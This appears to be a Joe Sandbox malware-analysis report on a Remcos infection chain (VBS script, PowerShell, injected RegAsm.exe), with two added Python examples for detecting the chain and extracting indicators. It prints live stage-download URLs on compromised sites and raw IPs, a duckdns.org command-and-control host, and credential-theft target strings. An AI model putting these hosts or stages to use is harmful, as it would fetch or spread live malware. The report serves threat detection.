Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_10006580 FindFirstFileExA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0040AE51 FindFirstFileW,FindNextFileW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
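The three parent/child lines above describe one delivery chain: a script host (wscript.exe) launches PowerShell, which in turn starts the signed .NET utility RegAsm.exe that ends up hosting the injected payload. The following is an added example, not part of the Joe Sandbox report, showing how a detection over process-creation events can surface that chain. The event records are constructed to mirror the report's process tree with benign noise added; the ProcEvent field names and pid values are assumptions, and the inclusion of cscript.exe, pwsh.exe, RegSvcs.exe and InstallUtil.exe alongside the binaries the report actually shows is an assumed generalization.

```python
"""Flag the wscript.exe -> powershell.exe -> RegAsm.exe process chain.

Added example, not part of the Joe Sandbox report. Events are constructed to
mirror the report's three "Child:" lines; pids and field names are assumptions.
"""
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str


# Constructed process-creation events (not captured data).
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, r"C:\Windows\explorer.exe"),
    ProcEvent(1200, 1000, r"C:\Windows\System32\wscript.exe"),
    ProcEvent(1300, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(1400, 1300, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"),
    ProcEvent(1500, 1000, r"C:\Windows\SysWOW64\wscript.exe"),
    ProcEvent(1600, 1500, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(1700, 1000, r"C:\Windows\System32\cmd.exe"),  # benign admin shell
    ProcEvent(1800, 1700, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # cscript.exe added as an assumption
POWERSHELL = {"powershell.exe", "pwsh.exe"}     # pwsh.exe added as an assumption
# RegAsm.exe is what the report shows; RegSvcs/InstallUtil are the same class of
# signed .NET framework utility and are included as an assumption.
DOTNET_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe"}


def basename(image: str) -> str:
    """Case-insensitive image name, so System32 and SysWOW64 paths match alike."""
    return ntpath.basename(image).lower()


def detect(events):
    """Return the full 3-stage chains and the 2-stage script-host -> PowerShell hits.

    full: list of (script_host_pid, powershell_pid, dotnet_host_pid)
    script_host_to_powershell: list of (script_host_pid, powershell_pid)
    """
    by_pid = {e.pid: e for e in events}
    full, two_stage = [], []
    for e in events:
        if basename(e.image) not in POWERSHELL:
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or basename(parent.image) not in SCRIPT_HOSTS:
            continue  # PowerShell from cmd.exe/explorer.exe is not this chain
        two_stage.append((parent.pid, e.pid))
        for child in events:
            if child.ppid == e.pid and basename(child.image) in DOTNET_HOSTS:
                full.append((parent.pid, e.pid, child.pid))
    return {"full": full, "script_host_to_powershell": two_stage}


if __name__ == "__main__":
    result = detect(SAMPLE_EVENTS)
    for chain in result["full"]:
        print("script host -> PowerShell -> .NET host:", chain)
    for pair in result["script_host_to_powershell"]:
        print("script host -> PowerShell:", pair)
```

The two-stage hit alone is worth an alert on most fleets (the report's own Sigma hit "Cscript/Wscript Uncommon Script Extension Execution" fires on the same parent); the three-stage chain is the high-confidence signal, because RegAsm.exe launched by PowerShell has no normal business reason and in this sample is the process that carries the injected Remcos payload.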

Networking

Source: Malware configuration extractor | URLs: iwarsut775laudrye2.duckdns.org
Source: unknown | DNS query: name: iwarsut775laudrye2.duckdns.org
Source: createdthingstobefrankwithmeeverywhere.gIF.vbs | Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: createdthingstobefrankwithmeeverywhere.gIF.vbs | Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
Source: global traffic | HTTP traffic detected: GET /os/transportment.pfm HTTP/1.1 | Host: asociatiatraditiimaria.ro
Source: global traffic | HTTP traffic detected: GET /wp-admin/oserve/transportment.pfm HTTP/1.1 | Host: new.quranushaiqer.org.sa | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1 | Host: 198.46.176.133 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /59/LMTS.txt HTTP/1.1 | Host: 104.168.45.34 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 93.113.54.56
Source: Joe Sandbox View | IP Address: 192.253.251.227
Source: Joe Sandbox View | IP Address: 198.46.176.133
Source: Joe Sandbox View | ASN Name: THORDC-ASIS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /os/transportment.pfm HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: asociatiatraditiimaria.ro | Connection: Keep-Alive
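The HTTP lines above are the stage-download and check-in traffic: two WordPress sites serving transportment.pfm, two stages fetched by raw IP under image/text file names (vbs.jpeg, LMTS.txt), and the geoplugin.net geolocation call Remcos makes after it starts. Because the report's request lines lost their CRLFs in extraction, the headers run together ("HTTP/1.1Host: ..."), which defeats naive copy-paste into a blocklist. The following is an added example, not part of the Joe Sandbox report, that parses those lines into URL indicators and classifies each host as a raw IP, a dynamic-DNS name, or an ordinary domain. REPORT_LINES are copied from this page (the last one in the re-separated " | " form that also appears here); the dynamic-DNS suffixes beyond duckdns.org, the C2 the report's configuration extractor names, are an assumption.

```python
"""Turn the report's "HTTP traffic detected" lines into a URL IOC list.

Added example, not part of the Joe Sandbox report. Headers in the extracted
lines are fused ("HTTP/1.1Host: ..."), so the parser splits on known header
names; it also accepts lines where headers were re-separated with " | ".
"""
import ipaddress
import re

# Copied from the report as extracted; the last line shows the " | " separated form.
REPORT_LINES = [
    "Source: global trafficHTTP traffic detected: GET /os/transportment.pfm HTTP/1.1Host: asociatiatraditiimaria.ro",
    "Source: global trafficHTTP traffic detected: GET /wp-admin/oserve/transportment.pfm HTTP/1.1Host: new.quranushaiqer.org.saConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /59/LMTS.txt HTTP/1.1Host: 104.168.45.34Connection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache",
    "Source: global traffic | HTTP traffic detected: GET /os/transportment.pfm HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: asociatiatraditiimaria.ro | Connection: Keep-Alive",
]

MARKER = "HTTP traffic detected: "
HEADER_NAMES = ("Host", "User-Agent", "Connection", "Cache-Control",
                "Accept", "Content-Type", "Content-Length")
# Zero-width split just before a known header name, swallowing a " | " if present.
SPLIT_RE = re.compile(r"(?: \| )?(?=(?:%s): )" % "|".join(re.escape(h) for h in HEADER_NAMES))
REQ_RE = re.compile(r"^(?P<method>GET|POST|HEAD) (?P<path>\S+) HTTP/1\.[01](?P<rest>.*)$")
# duckdns.org is the report's C2 provider; the other suffixes are an assumption.
DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net")


def parse_request(line: str):
    """Return {'method', 'path', 'headers'} for one request line, or None."""
    if MARKER in line:
        line = line.split(MARKER, 1)[1]
    m = REQ_RE.match(line.strip())
    if not m:
        return None
    headers = {}
    for chunk in SPLIT_RE.split(m.group("rest")):
        if ": " in chunk:
            name, value = chunk.split(": ", 1)
            headers[name] = value.strip()
    return {"method": m.group("method"), "path": m.group("path"), "headers": headers}


def classify_host(host: str) -> str:
    """'raw-ip' for literal addresses, 'dynamic-dns' for known DDNS suffixes, else 'domain'."""
    host = host.split(":")[0].lower()
    try:
        ipaddress.ip_address(host)
        return "raw-ip"
    except ValueError:
        pass
    if any(host == s or host.endswith("." + s) for s in DYNDNS_SUFFIXES):
        return "dynamic-dns"
    return "domain"


def extract_iocs(lines):
    """One IOC record per parseable request line that carries a Host header."""
    iocs = []
    for line in lines:
        req = parse_request(line)
        if not req or "Host" not in req["headers"]:
            continue
        host = req["headers"]["Host"]
        iocs.append({
            "url": f"http://{host}{req['path']}",  # plaintext HTTP: the capture shows the headers
            "host": host,
            "host_kind": classify_host(host),
            "method": req["method"],
            "headers": req["headers"],
        })
    return iocs


if __name__ == "__main__":
    for ioc in extract_iocs(REPORT_LINES):
        print(f"{ioc['host_kind']:12} {ioc['url']}")
```

Two things the output makes visible that the raw lines hide: the stage hosts contacted by literal IP (no DNS, so DNS-based blocking never sees them), and the spoofed Firefox User-Agent on the PowerShell download, which does not match anything else the sandbox's Windows 10 host would send.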
Source: unknown | TCP traffic detected without corresponding DNS query: 198.46.176.133 (50 connections observed)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
Source: RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
Source: RegAsm.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: RegAsm.exe, 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: RegAsm.exe, 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: iwarsut775laudrye2.duckdns.org
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: global traffic | DNS traffic detected: DNS query: asociatiatraditiimaria.ro
Source: global traffic | DNS traffic detected: DNS query: new.quranushaiqer.org.sa
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | content-type: text/html; charset=UTF-8 | link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/" | transfer-encoding: chunked | date: Sat, 27 Jul 2024 11:31:16 GMT | server: LiteSpeed | alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | content-type: text/html; charset=UTF-8 | link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/" | transfer-encoding: chunked | date: Sat, 27 Jul 2024 11:31:23 GMT | server: LiteSpeed
                  Source: powershell.exe, 00000002.00000002.2051614764.000001B1D1AA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.45.34
                  Source: powershell.exe, 00000002.00000002.2051614764.000001B1D1AA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.45.34/59/LMTS.txt
                  Source: powershell.exe, 00000002.00000002.2051614764.000001B1D1AA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133
                  Source: powershell.exe, 00000002.00000002.2051614764.000001B1D1AA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133/Upload/vbs.jpeg
                  Source: powershell.exe, 00000002.00000002.2167362177.000001B1E9A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133/Upload/vbs.jpegM
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                  Source: wscript.exe, 00000005.00000003.2140898625.0000000003281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2125566333.0000000003306000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2141365751.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2124716308.00000000032CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2126019365.000000000332D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.2143150221.00000000032A7000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: wscript.exe, 00000005.00000003.2140898625.0000000003281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2141365751.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.2143150221.00000000032A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enclE8
                  Source: RegAsm.exe, 00000004.00000002.3267737078.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, bhvCCC4.tmp.7.drString found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://ocsp.digicert.com0:
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://ocsp.digicert.com0H
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://ocsp.digicert.com0I
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://ocsp.msocsp.com0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://ocsp.msocsp.com0S
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://ocspx.digicert.com0E
                  Source: powershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000002.00000002.2051614764.000001B1D1881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3272627711.0000000004195000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3272352105.0000000005281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://www.digicert.com/CPS0~
                  Source: RegAsm.exe, RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: RegAsm.exe, RegAsm.exe, 00000009.00000002.2124009469.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: RegAsm.exe, 00000009.00000002.2124009469.00000000011CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
                  Source: RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696428304750
                  Source: RegAsm.exe, 00000007.00000002.2129094375.00000000010F4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                  Source: powershell.exe, 00000002.00000002.2051614764.000001B1D1881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 0000000A.00000002.3272627711.0000000004195000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3272352105.0000000005281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: powershell.exe, 0000000A.00000002.3272627711.000000000453D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3272627711.0000000004491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
                  Source: powershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro
                  Source: powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/comments/feed/
                  Source: powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/feed/
                  Source: powershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3272352105.00000000053D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/os/transportment.pfm
                  Source: powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=
                  Source: powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2
                  Source: powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767
                  Source: powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
                  Source: powershell.exe, 0000000A.00000002.3272627711.000000000453D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3272627711.0000000004491000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://asociatiatraditiimaria.ro/wp-json/
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                  Source: powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF
                  Source: powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Nunito
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?77686a33b2eafa1538ef78c3be5a5910
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?caa2cf97cacae25a18f577703684ee65
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7e9591e308dbda599df1fc08720a72a3
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?c6a2869c584d2ea23c67c44abe1ec326
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                  Source: powershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gmpg.org/xfn/11
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: RegAsm.exe | String found in binary or memory: https://login.yahoo.com/config/login
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                  Source: bhvCCC4.tmp.7.dr | String found in binary or memory: https://maps.windows.com/windows-app-web-link
                  Source: powershell.exe, 0000000A.00000002.3272627711.000000000453D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://new.quranushaiqer.org.sa
                  Source: powershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm0
